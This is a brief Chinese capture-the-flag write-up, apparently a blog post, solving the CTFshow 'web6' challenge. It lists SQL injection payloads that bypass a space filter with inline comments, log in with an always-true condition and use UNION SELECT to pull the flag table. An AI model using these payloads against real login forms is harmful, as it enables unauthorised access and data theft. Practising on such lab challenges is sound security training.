刷题之旅第26站,CTFshow web6

感谢ctf show平台提供题目

进行常规注入,发现空格被过滤了。

username=admin&password=' 

在这里插入图片描述

使用/**/ 绕过空格,登陆成功。

'or/**/1=1#

在这里插入图片描述

猜测数据结构,可能与之前一样,没有变化,测试一下。

'or/**/1=1/**/union/**/select/**/flag/**/from/**/flag#

得到flag
在这里插入图片描述

原创文章不易,点个赞再走吧。
在这里插入图片描述

发布了50 篇原创文章 · 获赞 12 · 访问量 1889

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104351513